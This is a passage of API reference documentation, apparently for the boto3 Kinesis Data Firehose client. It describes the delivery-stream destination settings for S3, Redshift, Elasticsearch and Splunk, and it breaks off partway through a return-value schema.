The "YYYY/MM/DD/HH" time format prefix is automatically used for delivered Amazon S3 files. You can also specify a custom prefix, as described in Custom Prefixes for Amazon S3 Objects .
ErrorOutputPrefix (string) --
A prefix that Kinesis Data Firehose evaluates and adds to failed records before writing them to S3. This prefix appears immediately following the bucket name. For information about how to specify this prefix, see Custom Prefixes for Amazon S3 Objects .
BufferingHints (dict) --
The buffering option.
SizeInMBs (integer) --
Buffer incoming data to the specified size, in MiBs, before delivering it to the destination. The default value is 5. This parameter is optional but if you specify a value for it, you must also specify a value for IntervalInSeconds , and vice versa.
We recommend setting this parameter to a value greater than the amount of data you typically ingest into the delivery stream in 10 seconds. For example, if you typically ingest data at 1 MiB/sec, the value should be 10 MiB or higher.
IntervalInSeconds (integer) --
Buffer incoming data for the specified period of time, in seconds, before delivering it to the destination. The default value is 300. This parameter is optional but if you specify a value for it, you must also specify a value for SizeInMBs , and vice versa.
CompressionFormat (string) --
The compression format. If no value is specified, the default is UNCOMPRESSED .
EncryptionConfiguration (dict) --
The encryption configuration. If no value is specified, the default is no encryption.
NoEncryptionConfig (string) --
Specifically override existing encryption information to ensure that no encryption is used.
KMSEncryptionConfig (dict) --
The encryption key.
AWSKMSKeyARN (string) --
The Amazon Resource Name (ARN) of the encryption key. Must belong to the same AWS Region as the destination Amazon S3 bucket. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .
CloudWatchLoggingOptions (dict) --
The Amazon CloudWatch logging options for your delivery stream.
Enabled (boolean) --
Enables or disables CloudWatch logging.
LogGroupName (string) --
The CloudWatch group name for logging. This value is required if CloudWatch logging is enabled.
LogStreamName (string) --
The CloudWatch log stream name for logging. This value is required if CloudWatch logging is enabled.
ProcessingConfiguration (dict) --
The data processing configuration.
Enabled (boolean) --
Enables or disables data processing.
Processors (list) --
The data processors.
(dict) --
Describes a data processor.
Type (string) --
The type of processor.
Parameters (list) --
The processor parameters.
(dict) --
Describes the processor parameter.
ParameterName (string) --
The name of the parameter.
ParameterValue (string) --
The parameter value.
S3BackupMode (string) --
The Amazon S3 backup mode.
S3BackupDescription (dict) --
The configuration for backup in Amazon S3.
RoleARN (string) --
The Amazon Resource Name (ARN) of the AWS credentials. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .
BucketARN (string) --
The ARN of the S3 bucket. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .
Prefix (string) --
The "YYYY/MM/DD/HH" time format prefix is automatically used for delivered Amazon S3 files. You can also specify a custom prefix, as described in Custom Prefixes for Amazon S3 Objects .
ErrorOutputPrefix (string) --
A prefix that Kinesis Data Firehose evaluates and adds to failed records before writing them to S3. This prefix appears immediately following the bucket name. For information about how to specify this prefix, see Custom Prefixes for Amazon S3 Objects .
BufferingHints (dict) --
The buffering option. If no value is specified, BufferingHints object default values are used.
SizeInMBs (integer) --
Buffer incoming data to the specified size, in MiBs, before delivering it to the destination. The default value is 5. This parameter is optional but if you specify a value for it, you must also specify a value for IntervalInSeconds , and vice versa.
We recommend setting this parameter to a value greater than the amount of data you typically ingest into the delivery stream in 10 seconds. For example, if you typically ingest data at 1 MiB/sec, the value should be 10 MiB or higher.
IntervalInSeconds (integer) --
Buffer incoming data for the specified period of time, in seconds, before delivering it to the destination. The default value is 300. This parameter is optional but if you specify a value for it, you must also specify a value for SizeInMBs , and vice versa.
CompressionFormat (string) --
The compression format. If no value is specified, the default is UNCOMPRESSED .
EncryptionConfiguration (dict) --
The encryption configuration. If no value is specified, the default is no encryption.
NoEncryptionConfig (string) --
Specifically override existing encryption information to ensure that no encryption is used.
KMSEncryptionConfig (dict) --
The encryption key.
AWSKMSKeyARN (string) --
The Amazon Resource Name (ARN) of the encryption key. Must belong to the same AWS Region as the destination Amazon S3 bucket. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .
CloudWatchLoggingOptions (dict) --
The Amazon CloudWatch logging options for your delivery stream.
Enabled (boolean) --
Enables or disables CloudWatch logging.
LogGroupName (string) --
The CloudWatch group name for logging. This value is required if CloudWatch logging is enabled.
LogStreamName (string) --
The CloudWatch log stream name for logging. This value is required if CloudWatch logging is enabled.
DataFormatConversionConfiguration (dict) --
The serializer, deserializer, and schema for converting data from the JSON format to the Parquet or ORC format before writing it to Amazon S3.
SchemaConfiguration (dict) --
Specifies the AWS Glue Data Catalog table that contains the column information. This parameter is required if Enabled is set to true.
RoleARN (string) --
The role that Kinesis Data Firehose can use to access AWS Glue. This role must be in the same account you use for Kinesis Data Firehose. Cross-account roles aren\'t allowed.
CatalogId (string) --
The ID of the AWS Glue Data Catalog. If you don\'t supply this, the AWS account ID is used by default.
DatabaseName (string) --
Specifies the name of the AWS Glue database that contains the schema for the output data.
TableName (string) --
Specifies the AWS Glue table that contains the column information that constitutes your data schema.
Region (string) --
If you don\'t specify an AWS Region, the default is the current Region.
VersionId (string) --
Specifies the table version for the output data schema. If you don\'t specify this version ID, or if you set it to LATEST , Kinesis Data Firehose uses the most recent version. This means that any updates to the table are automatically picked up.
InputFormatConfiguration (dict) --
Specifies the deserializer that you want Kinesis Data Firehose to use to convert the format of your data from JSON. This parameter is required if Enabled is set to true.
Deserializer (dict) --
Specifies which deserializer to use. You can choose either the Apache Hive JSON SerDe or the OpenX JSON SerDe. If both are non-null, the server rejects the request.
OpenXJsonSerDe (dict) --
The OpenX SerDe. Used by Kinesis Data Firehose for deserializing data, which means converting it from the JSON format in preparation for serializing it to the Parquet or ORC format. This is one of two deserializers you can choose, depending on which one offers the functionality you need. The other option is the native Hive / HCatalog JsonSerDe.
ConvertDotsInJsonKeysToUnderscores (boolean) --
When set to true , specifies that the names of the keys include dots and that you want Kinesis Data Firehose to replace them with underscores. This is useful because Apache Hive does not allow dots in column names. For example, if the JSON contains a key whose name is "a.b", you can define the column name to be "a_b" when using this option.
The default is false .
CaseInsensitive (boolean) --
When set to true , which is the default, Kinesis Data Firehose converts JSON keys to lowercase before deserializing them.
ColumnToJsonKeyMappings (dict) --
Maps column names to JSON keys that aren\'t identical to the column names. This is useful when the JSON contains keys that are Hive keywords. For example, timestamp is a Hive keyword. If you have a JSON key named timestamp , set this parameter to {"ts": "timestamp"} to map this key to a column named ts .
(string) --
(string) --
HiveJsonSerDe (dict) --
The native Hive / HCatalog JsonSerDe. Used by Kinesis Data Firehose for deserializing data, which means converting it from the JSON format in preparation for serializing it to the Parquet or ORC format. This is one of two deserializers you can choose, depending on which one offers the functionality you need. The other option is the OpenX SerDe.
TimestampFormats (list) --
Indicates how you want Kinesis Data Firehose to parse the date and timestamps that may be present in your input data JSON. To specify these format strings, follow the pattern syntax of JodaTime\'s DateTimeFormat format strings. For more information, see Class DateTimeFormat . You can also use the special value millis to parse timestamps in epoch milliseconds. If you don\'t specify a format, Kinesis Data Firehose uses java.sql.Timestamp::valueOf by default.
(string) --
OutputFormatConfiguration (dict) --
Specifies the serializer that you want Kinesis Data Firehose to use to convert the format of your data to the Parquet or ORC format. This parameter is required if Enabled is set to true.
Serializer (dict) --
Specifies which serializer to use. You can choose either the ORC SerDe or the Parquet SerDe. If both are non-null, the server rejects the request.
ParquetSerDe (dict) --
A serializer to use for converting data to the Parquet format before storing it in Amazon S3. For more information, see Apache Parquet .
BlockSizeBytes (integer) --
The Hadoop Distributed File System (HDFS) block size. This is useful if you intend to copy the data from Amazon S3 to HDFS before querying. The default is 256 MiB and the minimum is 64 MiB. Kinesis Data Firehose uses this value for padding calculations.
PageSizeBytes (integer) --
The Parquet page size. Column chunks are divided into pages. A page is conceptually an indivisible unit (in terms of compression and encoding). The minimum value is 64 KiB and the default is 1 MiB.
Compression (string) --
The compression code to use over data blocks. The possible values are UNCOMPRESSED , SNAPPY , and GZIP , with the default being SNAPPY . Use SNAPPY for higher decompression speed. Use GZIP if the compression ratio is more important than speed.
EnableDictionaryCompression (boolean) --
Indicates whether to enable dictionary compression.
MaxPaddingBytes (integer) --
The maximum amount of padding to apply. This is useful if you intend to copy the data from Amazon S3 to HDFS before querying. The default is 0.
WriterVersion (string) --
Indicates the version of row format to output. The possible values are V1 and V2 . The default is V1 .
OrcSerDe (dict) --
A serializer to use for converting data to the ORC format before storing it in Amazon S3. For more information, see Apache ORC .
StripeSizeBytes (integer) --
The number of bytes in each stripe. The default is 64 MiB and the minimum is 8 MiB.
BlockSizeBytes (integer) --
The Hadoop Distributed File System (HDFS) block size. This is useful if you intend to copy the data from Amazon S3 to HDFS before querying. The default is 256 MiB and the minimum is 64 MiB. Kinesis Data Firehose uses this value for padding calculations.
RowIndexStride (integer) --
The number of rows between index entries. The default is 10,000 and the minimum is 1,000.
EnablePadding (boolean) --
Set this to true to indicate that you want stripes to be padded to the HDFS block boundaries. This is useful if you intend to copy the data from Amazon S3 to HDFS before querying. The default is false .
PaddingTolerance (float) --
A number between 0 and 1 that defines the tolerance for block padding as a decimal fraction of stripe size. The default value is 0.05, which means 5 percent of stripe size.
For the default values of 64 MiB ORC stripes and 256 MiB HDFS blocks, the default block padding tolerance of 5 percent reserves a maximum of 3.2 MiB for padding within the 256 MiB block. In such a case, if the available size within the block is more than 3.2 MiB, a new, smaller stripe is inserted to fit within that space. This ensures that no stripe crosses block boundaries and causes remote reads within a node-local task.
Kinesis Data Firehose ignores this parameter when OrcSerDe$EnablePadding is false .
Compression (string) --
The compression code to use over data blocks. The default is SNAPPY .
BloomFilterColumns (list) --
The column names for which you want Kinesis Data Firehose to create bloom filters. The default is null .
(string) --
BloomFilterFalsePositiveProbability (float) --
The Bloom filter false positive probability (FPP). The lower the FPP, the bigger the Bloom filter. The default value is 0.05, the minimum is 0, and the maximum is 1.
DictionaryKeyThreshold (float) --
Represents the fraction of the total number of non-null rows. To turn off dictionary encoding, set this fraction to a number that is less than the number of distinct keys in a dictionary. To always use dictionary encoding, set this threshold to 1.
FormatVersion (string) --
The version of the file to write. The possible values are V0_11 and V0_12 . The default is V0_12 .
Enabled (boolean) --
Defaults to true . Set it to false if you want to disable format conversion while preserving the configuration details.
RedshiftDestinationDescription (dict) --
The destination in Amazon Redshift.
RoleARN (string) --
The Amazon Resource Name (ARN) of the AWS credentials. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .
ClusterJDBCURL (string) --
The database connection string.
CopyCommand (dict) --
The COPY command.
DataTableName (string) --
The name of the target table. The table must already exist in the database.
DataTableColumns (string) --
A comma-separated list of column names.
CopyOptions (string) --
Optional parameters to use with the Amazon Redshift COPY command. For more information, see the "Optional Parameters" section of Amazon Redshift COPY command . Some possible examples that would apply to Kinesis Data Firehose are as follows:
delimiter \'\\t\' lzop; - fields are delimited with "t" (TAB character) and compressed using lzop.
delimiter \'|\' - fields are delimited with "|" (this is the default delimiter).
delimiter \'|\' escape - the delimiter should be escaped.
fixedwidth \'venueid:3,venuename:25,venuecity:12,venuestate:2,venueseats:6\' - fields are fixed width in the source, with each width specified after every column in the table.
JSON \'s3://mybucket/jsonpaths.txt\' - data is in JSON format, and the path specified is the format of the data.
For more examples, see Amazon Redshift COPY command examples .
Username (string) --
The name of the user.
RetryOptions (dict) --
The retry behavior in case Kinesis Data Firehose is unable to deliver documents to Amazon Redshift. Default value is 3600 (60 minutes).
DurationInSeconds (integer) --
The length of time during which Kinesis Data Firehose retries delivery after a failure, starting from the initial request and including the first attempt. The default value is 3600 seconds (60 minutes). Kinesis Data Firehose does not retry if the value of DurationInSeconds is 0 (zero) or if the first delivery attempt takes longer than the current value.
S3DestinationDescription (dict) --
The Amazon S3 destination.
RoleARN (string) --
The Amazon Resource Name (ARN) of the AWS credentials. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .
BucketARN (string) --
The ARN of the S3 bucket. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .
Prefix (string) --
The "YYYY/MM/DD/HH" time format prefix is automatically used for delivered Amazon S3 files. You can also specify a custom prefix, as described in Custom Prefixes for Amazon S3 Objects .
ErrorOutputPrefix (string) --
A prefix that Kinesis Data Firehose evaluates and adds to failed records before writing them to S3. This prefix appears immediately following the bucket name. For information about how to specify this prefix, see Custom Prefixes for Amazon S3 Objects .
BufferingHints (dict) --
The buffering option. If no value is specified, BufferingHints object default values are used.
SizeInMBs (integer) --
Buffer incoming data to the specified size, in MiBs, before delivering it to the destination. The default value is 5. This parameter is optional but if you specify a value for it, you must also specify a value for IntervalInSeconds , and vice versa.
We recommend setting this parameter to a value greater than the amount of data you typically ingest into the delivery stream in 10 seconds. For example, if you typically ingest data at 1 MiB/sec, the value should be 10 MiB or higher.
IntervalInSeconds (integer) --
Buffer incoming data for the specified period of time, in seconds, before delivering it to the destination. The default value is 300. This parameter is optional but if you specify a value for it, you must also specify a value for SizeInMBs , and vice versa.
CompressionFormat (string) --
The compression format. If no value is specified, the default is UNCOMPRESSED .
EncryptionConfiguration (dict) --
The encryption configuration. If no value is specified, the default is no encryption.
NoEncryptionConfig (string) --
Specifically override existing encryption information to ensure that no encryption is used.
KMSEncryptionConfig (dict) --
The encryption key.
AWSKMSKeyARN (string) --
The Amazon Resource Name (ARN) of the encryption key. Must belong to the same AWS Region as the destination Amazon S3 bucket. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .
CloudWatchLoggingOptions (dict) --
The Amazon CloudWatch logging options for your delivery stream.
Enabled (boolean) --
Enables or disables CloudWatch logging.
LogGroupName (string) --
The CloudWatch group name for logging. This value is required if CloudWatch logging is enabled.
LogStreamName (string) --
The CloudWatch log stream name for logging. This value is required if CloudWatch logging is enabled.
ProcessingConfiguration (dict) --
The data processing configuration.
Enabled (boolean) --
Enables or disables data processing.
Processors (list) --
The data processors.
(dict) --
Describes a data processor.
Type (string) --
The type of processor.
Parameters (list) --
The processor parameters.
(dict) --
Describes the processor parameter.
ParameterName (string) --
The name of the parameter.
ParameterValue (string) --
The parameter value.
S3BackupMode (string) --
The Amazon S3 backup mode.
S3BackupDescription (dict) --
The configuration for backup in Amazon S3.
RoleARN (string) --
The Amazon Resource Name (ARN) of the AWS credentials. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .
BucketARN (string) --
The ARN of the S3 bucket. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .
Prefix (string) --
The "YYYY/MM/DD/HH" time format prefix is automatically used for delivered Amazon S3 files. You can also specify a custom prefix, as described in Custom Prefixes for Amazon S3 Objects .
ErrorOutputPrefix (string) --
A prefix that Kinesis Data Firehose evaluates and adds to failed records before writing them to S3. This prefix appears immediately following the bucket name. For information about how to specify this prefix, see Custom Prefixes for Amazon S3 Objects .
BufferingHints (dict) --
The buffering option. If no value is specified, BufferingHints object default values are used.
SizeInMBs (integer) --
Buffer incoming data to the specified size, in MiBs, before delivering it to the destination. The default value is 5. This parameter is optional but if you specify a value for it, you must also specify a value for IntervalInSeconds , and vice versa.
We recommend setting this parameter to a value greater than the amount of data you typically ingest into the delivery stream in 10 seconds. For example, if you typically ingest data at 1 MiB/sec, the value should be 10 MiB or higher.
IntervalInSeconds (integer) --
Buffer incoming data for the specified period of time, in seconds, before delivering it to the destination. The default value is 300. This parameter is optional but if you specify a value for it, you must also specify a value for SizeInMBs , and vice versa.
CompressionFormat (string) --
The compression format. If no value is specified, the default is UNCOMPRESSED .
EncryptionConfiguration (dict) --
The encryption configuration. If no value is specified, the default is no encryption.
NoEncryptionConfig (string) --
Specifically override existing encryption information to ensure that no encryption is used.
KMSEncryptionConfig (dict) --
The encryption key.
AWSKMSKeyARN (string) --
The Amazon Resource Name (ARN) of the encryption key. Must belong to the same AWS Region as the destination Amazon S3 bucket. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .
CloudWatchLoggingOptions (dict) --
The Amazon CloudWatch logging options for your delivery stream.
Enabled (boolean) --
Enables or disables CloudWatch logging.
LogGroupName (string) --
The CloudWatch group name for logging. This value is required if CloudWatch logging is enabled.
LogStreamName (string) --
The CloudWatch log stream name for logging. This value is required if CloudWatch logging is enabled.
CloudWatchLoggingOptions (dict) --
The Amazon CloudWatch logging options for your delivery stream.
Enabled (boolean) --
Enables or disables CloudWatch logging.
LogGroupName (string) --
The CloudWatch group name for logging. This value is required if CloudWatch logging is enabled.
LogStreamName (string) --
The CloudWatch log stream name for logging. This value is required if CloudWatch logging is enabled.
ElasticsearchDestinationDescription (dict) --
The destination in Amazon ES.
RoleARN (string) --
The Amazon Resource Name (ARN) of the AWS credentials. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .
DomainARN (string) --
The ARN of the Amazon ES domain. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .
Kinesis Data Firehose uses either ClusterEndpoint or DomainARN to send data to Amazon ES.
ClusterEndpoint (string) --
The endpoint to use when communicating with the cluster. Kinesis Data Firehose uses either this ClusterEndpoint or the DomainARN field to send data to Amazon ES.
IndexName (string) --
The Elasticsearch index name.
TypeName (string) --
The Elasticsearch type name. This applies to Elasticsearch 6.x and lower versions. For Elasticsearch 7.x, there\'s no value for TypeName .
IndexRotationPeriod (string) --
The Elasticsearch index rotation period
BufferingHints (dict) --
The buffering options.
IntervalInSeconds (integer) --
Buffer incoming data for the specified period of time, in seconds, before delivering it to the destination. The default value is 300 (5 minutes).
SizeInMBs (integer) --
Buffer incoming data to the specified size, in MBs, before delivering it to the destination. The default value is 5.
We recommend setting this parameter to a value greater than the amount of data you typically ingest into the delivery stream in 10 seconds. For example, if you typically ingest data at 1 MB/sec, the value should be 10 MB or higher.
RetryOptions (dict) --
The Amazon ES retry options.
DurationInSeconds (integer) --
After an initial failure to deliver to Amazon ES, the total amount of time during which Kinesis Data Firehose retries delivery (including the first attempt). After this time has elapsed, the failed documents are written to Amazon S3. Default value is 300 seconds (5 minutes). A value of 0 (zero) results in no retries.
S3BackupMode (string) --
The Amazon S3 backup mode.
S3DestinationDescription (dict) --
The Amazon S3 destination.
RoleARN (string) --
The Amazon Resource Name (ARN) of the AWS credentials. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .
BucketARN (string) --
The ARN of the S3 bucket. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .
Prefix (string) --
The "YYYY/MM/DD/HH" time format prefix is automatically used for delivered Amazon S3 files. You can also specify a custom prefix, as described in Custom Prefixes for Amazon S3 Objects .
ErrorOutputPrefix (string) --
A prefix that Kinesis Data Firehose evaluates and adds to failed records before writing them to S3. This prefix appears immediately following the bucket name. For information about how to specify this prefix, see Custom Prefixes for Amazon S3 Objects .
BufferingHints (dict) --
The buffering option. If no value is specified, BufferingHints object default values are used.
SizeInMBs (integer) --
Buffer incoming data to the specified size, in MiBs, before delivering it to the destination. The default value is 5. This parameter is optional but if you specify a value for it, you must also specify a value for IntervalInSeconds , and vice versa.
We recommend setting this parameter to a value greater than the amount of data you typically ingest into the delivery stream in 10 seconds. For example, if you typically ingest data at 1 MiB/sec, the value should be 10 MiB or higher.
IntervalInSeconds (integer) --
Buffer incoming data for the specified period of time, in seconds, before delivering it to the destination. The default value is 300. This parameter is optional but if you specify a value for it, you must also specify a value for SizeInMBs , and vice versa.
CompressionFormat (string) --
The compression format. If no value is specified, the default is UNCOMPRESSED .
EncryptionConfiguration (dict) --
The encryption configuration. If no value is specified, the default is no encryption.
NoEncryptionConfig (string) --
Specifically override existing encryption information to ensure that no encryption is used.
KMSEncryptionConfig (dict) --
The encryption key.
AWSKMSKeyARN (string) --
The Amazon Resource Name (ARN) of the encryption key. Must belong to the same AWS Region as the destination Amazon S3 bucket. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .
CloudWatchLoggingOptions (dict) --
The Amazon CloudWatch logging options for your delivery stream.
Enabled (boolean) --
Enables or disables CloudWatch logging.
LogGroupName (string) --
The CloudWatch group name for logging. This value is required if CloudWatch logging is enabled.
LogStreamName (string) --
The CloudWatch log stream name for logging. This value is required if CloudWatch logging is enabled.
ProcessingConfiguration (dict) --
The data processing configuration.
Enabled (boolean) --
Enables or disables data processing.
Processors (list) --
The data processors.
(dict) --
Describes a data processor.
Type (string) --
The type of processor.
Parameters (list) --
The processor parameters.
(dict) --
Describes the processor parameter.
ParameterName (string) --
The name of the parameter.
ParameterValue (string) --
The parameter value.
CloudWatchLoggingOptions (dict) --
The Amazon CloudWatch logging options.
Enabled (boolean) --
Enables or disables CloudWatch logging.
LogGroupName (string) --
The CloudWatch group name for logging. This value is required if CloudWatch logging is enabled.
LogStreamName (string) --
The CloudWatch log stream name for logging. This value is required if CloudWatch logging is enabled.
VpcConfigurationDescription (dict) --
The details of the VPC of the Amazon ES destination.
SubnetIds (list) --
The IDs of the subnets that Kinesis Data Firehose uses to create ENIs in the VPC of the Amazon ES destination. Make sure that the routing tables and inbound and outbound rules allow traffic to flow from the subnets whose IDs are specified here to the subnets that have the destination Amazon ES endpoints. Kinesis Data Firehose creates at least one ENI in each of the subnets that are specified here. Do not delete or modify these ENIs.
The number of ENIs that Kinesis Data Firehose creates in the subnets specified here scales up and down automatically based on throughput. To enable Kinesis Data Firehose to scale up the number of ENIs to match throughput, ensure that you have sufficient quota. To help you calculate the quota you need, assume that Kinesis Data Firehose can create up to three ENIs for this delivery stream for each of the subnets specified here. For more information about ENI quota, see Network Interfaces in the Amazon VPC Quotas topic.
(string) --
RoleARN (string) --
The ARN of the IAM role that you want the delivery stream uses to create endpoints in the destination VPC.
SecurityGroupIds (list) --
The IDs of the security groups that Kinesis Data Firehose uses when it creates ENIs in the VPC of the Amazon ES destination.
(string) --
VpcId (string) --
The ID of the Amazon ES destination\'s VPC.
SplunkDestinationDescription (dict) --
The destination in Splunk.
HECEndpoint (string) --
The HTTP Event Collector (HEC) endpoint to which Kinesis Data Firehose sends your data.
HECEndpointType (string) --
This type can be either "Raw" or "Event."
HECToken (string) --
A GUID you obtain from your Splunk cluster when you create a new HEC endpoint.
HECAcknowledgmentTimeoutInSeconds (integer) --
The amount of time that Kinesis Data Firehose waits to receive an acknowledgment from Splunk after it sends it data. At the end of the timeout period, Kinesis Data Firehose either tries to send the data again or considers it an error, based on your retry settings.
RetryOptions (dict) --
The retry behavior in case Kinesis Data Firehose is unable to deliver data to Splunk or if it doesn\'t receive an acknowledgment of receipt from Splunk.
DurationInSeconds (integer) --
The total amount of time that Kinesis Data Firehose spends on retries. This duration starts after the initial attempt to send data to Splunk fails. It doesn\'t include the periods during which Kinesis Data Firehose waits for acknowledgment from Splunk after each attempt.
S3BackupMode (string) --
Defines how documents should be delivered to Amazon S3. When set to FailedDocumentsOnly , Kinesis Data Firehose writes any data that could not be indexed to the configured Amazon S3 destination. When set to AllDocuments , Kinesis Data Firehose delivers all incoming records to Amazon S3, and also writes failed documents to Amazon S3. Default value is FailedDocumentsOnly .
S3DestinationDescription (dict) --
The Amazon S3 destination.>
RoleARN (string) --
The Amazon Resource Name (ARN) of the AWS credentials. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .
BucketARN (string) --
The ARN of the S3 bucket. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .
Prefix (string) --
The "YYYY/MM/DD/HH" time format prefix is automatically used for delivered Amazon S3 files. You can also specify a custom prefix, as described in Custom Prefixes for Amazon S3 Objects .
ErrorOutputPrefix (string) --
A prefix that Kinesis Data Firehose evaluates and adds to failed records before writing them to S3. This prefix appears immediately following the bucket name. For information about how to specify this prefix, see Custom Prefixes for Amazon S3 Objects .
BufferingHints (dict) --
The buffering option. If no value is specified, BufferingHints object default values are used.
SizeInMBs (integer) --
Buffer incoming data to the specified size, in MiBs, before delivering it to the destination. The default value is 5. This parameter is optional but if you specify a value for it, you must also specify a value for IntervalInSeconds , and vice versa.
We recommend setting this parameter to a value greater than the amount of data you typically ingest into the delivery stream in 10 seconds. For example, if you typically ingest data at 1 MiB/sec, the value should be 10 MiB or higher.
IntervalInSeconds (integer) --
Buffer incoming data for the specified period of time, in seconds, before delivering it to the destination. The default value is 300. This parameter is optional but if you specify a value for it, you must also specify a value for SizeInMBs , and vice versa.
CompressionFormat (string) --
The compression format. If no value is specified, the default is UNCOMPRESSED .
EncryptionConfiguration (dict) --
The encryption configuration. If no value is specified, the default is no encryption.
NoEncryptionConfig (string) --
Specifically override existing encryption information to ensure that no encryption is used.
KMSEncryptionConfig (dict) --
The encryption key.
AWSKMSKeyARN (string) --
The Amazon Resource Name (ARN) of the encryption key. Must belong to the same AWS Region as the destination Amazon S3 bucket. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .
CloudWatchLoggingOptions (dict) --
The Amazon CloudWatch logging options for your delivery stream.
Enabled (boolean) --
Enables or disables CloudWatch logging.
LogGroupName (string) --
The CloudWatch group name for logging. This value is required if CloudWatch logging is enabled.
LogStreamName (string) --
The CloudWatch log stream name for logging. This value is required if CloudWatch logging is enabled.
ProcessingConfiguration (dict) --
The data processing configuration.
Enabled (boolean) --
Enables or disables data processing.
Processors (list) --
The data processors.
(dict) --
Describes a data processor.
Type (string) --
The type of processor.
Parameters (list) --
The processor parameters.
(dict) --
Describes the processor parameter.
ParameterName (string) --
The name of the parameter.
ParameterValue (string) --
The parameter value.
CloudWatchLoggingOptions (dict) --
The Amazon CloudWatch logging options for your delivery stream.
Enabled (boolean) --
Enables or disables CloudWatch logging.
LogGroupName (string) --
The CloudWatch group name for logging. This value is required if CloudWatch logging is enabled.
LogStreamName (string) --
The CloudWatch log stream name for logging. This value is required if CloudWatch logging is enabled.
HasMoreDestinations (boolean) --
Indicates whether there are more destinations available to list.
Exceptions
Firehose.Client.exceptions.ResourceNotFoundException
:return: {
'DeliveryStreamDescription': {
'DeliveryStreamName': 'string',
'DeliveryStreamARN': 'string',
'DeliveryStreamStatus': 'CREATING'|'CREATING_FAILED'|'DELETING'|'DELETING_FAILED'|'ACTIVE',
'FailureDescription': {
'Type': 'RETIRE_KMS_GRANT_FAILED'|'CREATE_KMS_GRANT_FAILED'|'KMS_ACCESS_DENIED'|'DISABLED_KMS_KEY'|'INVALID_KMS_KEY'|'KMS_KEY_NOT_FOUND'|'KMS_OPT_IN_REQUIRED'|'CREATE_ENI_FAILED'|'DELETE_ENI_FAILED'|'SUBNET_NOT_FOUND'|'SECURITY_GROUP_NOT_FOUND'|'ENI_ACCESS_DENIED'|'SUBNET_ACCESS_DENIED'|'SECURITY_GROUP_ACCESS_DENIED'|'UNKNOWN_ERROR',
'Details': 'string'
},
'DeliveryStreamEncryptionConfiguration': {
'KeyARN': 'string',
'KeyType': 'AWS_OWNED_CMK'|'CUSTOMER_MANAGED_CMK',
'Status': 'ENABLED'|'ENABLING'|'ENABLING_FAILED'|'DISABLED'|'DISABLING'|'DISABLING_FAILED',
'FailureDescription': {
'Type': 'RETIRE_KMS_GRANT_FAILED'|'CREATE_KMS_GRANT_FAILED'|'KMS_ACCESS_DENIED'|'DISABLED_KMS_KEY'|'INVALID_KMS_KEY'|'KMS_KEY_NOT_FOUND'|'KMS_OPT_IN_REQUIRED'|'CREATE_ENI_FAILED'|'DELETE_ENI_FAILED'|'SUBNET_NOT_FOUND'|'SECURITY_GROUP_NOT_FOUND'|'ENI_ACCESS_DENIED'|'SUBNET_ACCESS_DENIED'|'SECURITY_GROUP_ACCESS_DENIED'|'UNKNOWN_ERROR',
'Details': 'string'
}
},
'DeliveryStreamType': 'DirectPut'|'KinesisStreamAsSource',
'VersionId': 'string',
'CreateTimestamp': datetime(2015, 1, 1),
'LastUpdateTimestamp': datetime(2015, 1, 1),
'Source': {
'KinesisStreamSourceDescription': {
'KinesisStreamARN': 'string',
'RoleARN': 'string',
'DeliveryStartTimestamp': datetime(2015, 1, 1)
}
},
'Destinations': [
{
'DestinationId': 'string',
'S3DestinationDescription': {
'RoleARN': 'string',
'BucketARN': 'string',
'Prefix': 'string',
'ErrorOutputPrefix': 'string',
'BufferingHints': {
'SizeInMBs': 123,
'IntervalInSeconds': 123
},
'CompressionFormat': 'UNCOMPRESSED'|'GZIP'|'ZIP'|'Snappy'|'HADOOP_SNAPPY',
'EncryptionConfiguration': {
'NoEncryptionConfig': 'NoEncryption',
'KMSEncryptionConfig': {
'AWSKMSKeyARN': 'string'
}
},
'CloudWatchLoggingOptions': {
'Enabled': True|False,
'LogGroupName': 'string',
'LogStreamName': 'string'
}
},
'ExtendedS3DestinationDescription': {
'RoleARN': 'string',
'BucketARN': 'string',
'Prefix': 'string',
'ErrorOutputPrefix': 'string',
'BufferingHints': {
'SizeInMBs': 123,
'IntervalInSeconds': 123
},
'CompressionFormat': 'UNCOMPRESSED'|'GZIP'|'ZIP'|'Snappy'|'HADOOP_SNAPPY',
'EncryptionConfiguration': {
'NoEncryptionConfig': 'NoEncryption',
'KMSEncryptionConfig': {
'AWSKMSKeyARN': 'string'
}
},
'CloudWatchLoggingOptions': {
'Enabled': True|False,
'LogGroupName': 'string',
'LogStreamName': 'string'
},
'ProcessingConfiguration': {
'Enabled': True|False,
'Processors': [
{
'Type': 'Lambda',
'Parameters': [
{
'ParameterName': 'LambdaArn'|'NumberOfRetries'|'RoleArn'|'BufferSizeInMBs'|'BufferIntervalInSeconds',
'ParameterValue': 'string'
},
]
},
]
},
'S3BackupMode': 'Disabled'|'Enabled',
'S3BackupDescription': {
'RoleARN': 'string',
'BucketARN': 'string',
'Prefix': 'string',
'ErrorOutputPrefix': 'string',
'BufferingHints': {
'SizeInMBs': 123,
'IntervalInSeconds': 123
},
'CompressionFormat': 'UNCOMPRESSED'|'GZIP'|'ZIP'|'Snappy'|'HADOOP_SNAPPY',
'EncryptionConfiguration': {
'NoEncryptionConfig': 'NoEncryption',
'KMSEncryptionConfig': {
'AWSKMSKeyARN': 'string'
}
},
'CloudWatchLoggingOptions': {
'Enabled': True|False,
'LogGroupName': 'string',
'LogStreamName': 'string'
}
},
'DataFormatConversionConfiguration': {
'SchemaConfiguration': {
'RoleARN': 'string',
'CatalogId': 'string',
'DatabaseName': 'string',
'TableName': 'string',
